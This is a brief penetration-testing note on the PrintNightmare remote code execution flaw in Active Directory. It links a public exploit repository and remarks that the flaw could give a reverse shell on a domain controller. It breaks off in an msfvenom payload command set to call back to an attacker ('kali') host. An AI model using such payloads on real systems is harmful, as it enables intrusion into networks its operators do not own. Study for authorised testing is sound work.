PrintNightmare
Active Directory
Initial Attack Vectors: Multipurpose
Remote Code Execution
https://github.com/cube0x0/CVE-2021-1675
Contains full details on scanning and mitigation. Could potentially be used against a domain controller for easy access to a reverse shell.
Create Payload
msfvenom -p <payload> LHOST=<kali-ip> LPO...